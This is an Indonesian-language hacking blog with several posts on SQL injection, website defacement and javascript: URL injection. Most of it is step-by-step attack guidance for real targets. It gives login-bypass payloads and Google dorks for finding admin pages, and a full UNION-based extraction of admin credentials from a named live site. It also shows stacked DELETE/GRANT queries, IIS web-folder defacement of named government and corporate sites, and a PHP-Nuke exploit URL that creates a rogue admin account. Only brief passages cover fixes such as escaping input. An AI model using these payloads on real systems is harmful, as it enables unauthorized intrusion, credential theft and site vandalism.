Translate This Blog

English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified
by : NUROFIK

SQL INJECTION 1

Rabu, 25 Mei 2011

Contoh sintaks SQL Injection

Contoh sintak SQL dalam PHP

1. $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2. isikan password dengan string ’ or ’’ = ’
3. hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4. maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL



Contoh sintaks SQL Injection

1. Sintaks SQL string ‘-- setelah nama username
2. Query database awal :
Berubah menjadi :


Contoh sintaks SQL Injection

SQL Injection melalui URL, contohnya :

Penanganan SQL Injection

1. Merubah script php
2. Menggunakan MySQL_escape_string
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :

$query = "select id,name,email,password,type,block from user " .

"where email = '$Email' and password = '$Password'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];
  $name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{

echo "\n";

exit();

}

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :

$query = "select id,name,email,password,type,block from user".

"where email = '$Email'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];

$name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{
echo "\n";

exit();

}

$pass = md5($Password);

else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion

Contoh : $kar = “SQL injec’tion”;

$filter = mySQL_escape_string($kar);

echo”Hasil filter : $filter”;

Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php

Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1. Masuk ke google atau browse yg lain
2. Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4. Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7. Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
READ MORE - SQL INJECTION 1

SQL INJECTION 2

to the point.. talk less do more

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10'

klo keluar tulisan error sql berarti webnya bisa di SQLi.



langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)--

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300--

kalo ada tulisan :
Unknown column '300' in 'order clause'

itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26--

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27--

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28--

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak

depan id kasih tanda ( - )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11
selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

muncul versi database
5.0.51b-community-nt

[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--

penerapan dalam target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--

oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......

selanjutnya terserah anda..

segala akibat ditanggung sendiri"..

Sumber Tecon Indonesia 
READ MORE - SQL INJECTION 2

SQL INJECTION 3

SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri.
teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.
Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering
melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa
melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga ,
ini bisa dicegah jika kode program anda melakukan validasi yang baik.
Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi
justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.



Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan
sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai
contoh permulaan (maklumlah saya masih newbie ) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}


kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat
rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses
secara tidak sah
// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk
mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti
yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};


Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan 
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator
casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...';
READ MORE - SQL INJECTION 3

CARA DEFACE WEB 1

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id



Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server
tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.
  
READ MORE - CARA DEFACE WEB 1

CARA DEFACE 3 (Old Deface Situs PHP Nuke)

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya 
READ MORE - CARA DEFACE 3 (Old Deface Situs PHP Nuke)

JAVASCRIPT INJECTION

Javascript injection memeang tidak setenar php injection, namun kadang metode ini dibutuhkan. Pada artikel ini akan dibahas sekilas tentang bagaimana melakukan javascript injection secara sederhana.Untuk melakukan javascript injection lebih mudah bila menggunakan browser opera, karena browser ini memiliki fitur-fitur yang lengkap untuk urusan "begini" =P*
Menampilkan dan menulis sebuah cookieKadang kala sebuah website membuat cookie nya dengan javascript, nah untuk melihat cookie tersebut tanpa memanfaatkan fasilitas browser, kita dapat menggunakan perintah ini di url

javascript:alert(document.cookie);perintah`alert(..)`diatas digunakan untuk menampilkan sebuah popup box yang berisi cookie yang ada pada website tersebut.
sedangkan untuk mengganti cookie tersebut, kita dapat menggunakan perintah javascript:void(document.cookie="...");

*cara seperti diatas dapat juga digunakan untuk mengubah atau menampilkan value yang ada di formco.
menampilkan



javascript:alert(document.contoh.pass.value);

mengubah

javascript:void(document.contoh.pass.value="345");

Jika anda menggunakan browser opera, semua ini dapat dilakukan dengan mudah. Cukup tampilkan source dari web tersebut kemudian tuliskan javascript yang ingin anda jalankan pada sesudah tag lalu pilih apply changes.co.

anda ingin mengganti cookie dari suatu web, tulislah pada tag
document.cookie="qwerty";
anda ingin mengganti value dari field pada suatu form seperti contoh di atas
document.contoh.pass.value="345"
anda ingin mengganti referrer
document.referrer=http://qwerty.net;

Setelah di apply changes, maka website target anda telah dalam keadaan menjalankan javascript yang telah anda masukan tadi.
yup, itu sekilas dasar-dasar dari javascript injection. Jika tertarik lebih jauh anda bisa cari-cari referensi dari uncle google..^^ 
READ MORE - JAVASCRIPT INJECTION

JAVASCRIPT INJECTION 2

Javascript injection adalah suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

2 perintah yang biasa digunakan untuk Javascript injection adalah alert() dan void(). Contoh, untuk membuat pop-up window, masukkan kode ini ke URL situs:

javascript:alert(‘hello world’);

Tentu, kita bisa masukkan lebih dari 1 perintah di 1 baris. Selain itu, kita bisa menggunakan perintah alert() untuk memunculkan cookie ataupun variabel apapun yang dipakai di situs itu. Contoh:



javascript:alert(document.cookie); alert(variabel);

Hmm, tapi perintah-perintah tersebut hanyalah memunculkan suatu informasi tentang situs tersebut. Bagaimana kalau kita ingin menggantinya? perintah void() akan digunakan untuk ini. Contoh:

javascript:void(variabel=new value);
Struktur perintah untuk mengganti sebuah elemen dari suatu cookie juga hampir sama.

javascript:void(document.cookie=”Field = myValue”);

Perintah ini bisa digunakan untuk membuat Field baru ataupun untuk mengganti sebuah Field sudah ada. Contoh, kalau kita ingin mengganti administration field,

javascript:void(document.cookie=”Admin=True”);

Diatas itu, perintah void() tidak hanya berlaku untuk sebuah elemen saja, kita bisa juga mengganti sebuah form. Misal, kita mempunyai kode seperti:

1.

2. 

3. 
4.     


8.

Dan kita masukkan kode yang berikut

javascript:void(document.forms[0].elements[1].options[1].value=”Aku”);
Maka, yang dilakukannya adalah mengganti form yang pertama (/login.php), elemen yang kedua (select name=”loginID” ) dan pilihan yang kedua (option value=”Dia”)
Dia menjadi “Aku”. Tentu, jumlah perintah yang bisa kita lakukan dengan javascript injection jauh lebih banyak seperti javascript:document.forms[0].DocTitle.value=’ http://www.websiteApaSaja.com’; atau javascript:void(document.forms[0].action=”http://www.google.com”; dan seterusnya.
READ MORE - JAVASCRIPT INJECTION 2

JAVASCRIPT INJECTION 3

Javascript injection adalah teknik kecil yang bagus yang memungkinkan Anda untuk mengubah sebuah isi situs tanpa benar-benar meninggalkan situs. Ini dapat sangat berguna ketika mengatakan, Anda perlu spoof server dengan mengedit beberapa pilihan bentuk. Contoh akan dijelaskan di seluruh.

Isi:
I. Dasar-dasar Injeksi
II. Mengedit Cookie
III. Formulir Mengedit


I. Dasar-dasar Injeksi

suntikan Javascript dijalankan dari baris URL dari halaman yang Anda kunjungi. Untuk menggunakannya, Anda harus terlebih dahulu completly kosong URL dari URL bar. Itu berarti tidak ada http:// atau apapun.

Javascript dijalankan dari URL bar dengan menggunakan javascript: protokol. Dalam tutorial ini saya hanya akan mengajarkan anda tulang telanjang menggunakan ini, tetapi jika Anda seorang guru Javascript, Anda dapat memperluas javascript ini menggunakan tua polos.

Kedua perintah dibahas dalam tutorial ini adalah tanda (), dan void (); perintah. Ini cukup banyak semua yang Anda akan perlu dalam kebanyakan situasi. Untuk javascript pertama Anda, Anda akan membuat jendela sederhana muncul, pertama pergi ke situs web apapun dan kemudian ketik berikut ke URL bar anda:
Kode:

javascript: alert ('Hello, World');

Anda harus mendapatkan kotak dialog kecil yang mengatakan "Hello, World". Ini akan diubah nanti untuk memiliki kegunaan lebih praktis.

Anda juga dapat memiliki lebih dari satu perintah dijalankan pada waktu yang sama:

Kode:

javascript: alert ('Hello'); alert ('Dunia');

Ini akan muncul kotak yang mengatakan 'Halo' dan dari yang lain yang mengatakan 'Dunia'.

II. Mengedit Cookie

Pertama, periksa untuk melihat apakah situs yang anda kunjungi telah mengatur cookie dengan menggunakan script ini:

Kode:

javascript: alert (document.cookie);

Hal ini akan muncul informasi yang disimpan dalam cookie situs. Untuk mengedit informasi apapun, kami memanfaatkan void ();  
perintah.

Kode:

javascript: void (document.cookie = "Field = myValue");

Perintah ini bisa mengubah informasi yang ada atau membuat nilai yang sama sekali baru. Ganti "Field" dengan baik medan yang ada ditemukan dengan menggunakan alert (document.cookie); perintah, atau memasukkan nilai Anda sendiri. Kemudian ganti "myValue" dengan apapun yang Anda inginkan lapangan menjadi. Sebagai contoh:



Kode:

javascript: void (document.cookie = "Authorized = yes");

Apakah baik membuat lapangan "resmi" atau mengeditnya untuk mengatakan "ya" ... sekarang keduanya, atau tidak ini melakukan sesuatu yang berharga tergantung pada situs yang Anda suntik pada.

Hal ini juga berguna untuk memakukan sebuah (document.cookie) waspada, di akhir baris yang sama untuk melihat apa efek Anda mengubah miliki.

III. Formulir Mengedit

Kadang-kadang, untuk mengedit nilai dikirim ke sebuah website yang diberikan melalui formulir, Anda dapat men-download dan 
edit html yang sedikit untuk memungkinkan Anda untuk mengirimkan apa yang Anda inginkan. Namun, kadang-kadang cek website untuk melihat apakah Anda benar-benar dikirim dari situs web Anda seharusnya. Untuk menyiasati ini, kami hanya bisa mengedit bentuk langsung dari javascript. Catatan: Perubahan ini hanya sementara, jadi tidak tgunakan mencoba merusak sebuah situs melalui suntikan javascript seperti ini.

Setiap bentuk pada halaman Web tertentu (kecuali nama lain) disimpan dalam bentuk [x] array ... dimana "x" adalah nomor, agar dari atas ke bawah, dari semua bentuk dalam suatu halaman. Perhatikan bahwa bentuk mulai dari 0, maka bentuk pertama pada halaman benar-benar akan menjadi 0, dan yang kedua akan menjadi 1 dan seterusnya. Mari kita contoh ini:

Kode:

(form action="http://www.website.com/submit.php" method="post")
(input type="hidden" name="to" value="admin@website.com")

Catatan: Karena ini adalah bentuk pertama pada halaman, itu adalah bentuk [0]

Katakanlah formulir ini digunakan untuk email, mengatakan informasi server penting ke admin dari website. Anda tidak dapat hanya men-download naskah dan mengeditnya karena halaman submit.php mencari seorang referer. Anda dapat memeriksa untuk melihat apa nilai elemen bentuk tertentu telah dengan menggunakan script ini:
Kode:

javascript: alert (document.forms [0] to.value.)

Hal ini mirip dengan (document.cookie) alert; dibahas sebelumnya. Dalam hal ini, itu akan muncul peringatan yang mengatakan "admin@website.com"

Jadi di sini adalah cara Inject email Anda ke dalamnya. Anda dapat menggunakan cukup banyak teknik yang sama dengan mengedit cookies yang ditampilkan sebelumnya:

Kode:

javascript: void (document.forms [0] to.value = "email@nhacks.com".)

Hal ini akan mengubah email formulir ini untuk menjadi "email@nhacks.com". Kemudian Anda bisa menggunakan tanda (); script yang ditampilkan di atas untuk memeriksa pekerjaan Anda. Atau Anda dapat pasangan kedua perintah pada satu baris.
   
READ MORE - JAVASCRIPT INJECTION 3

 
 
 

Followers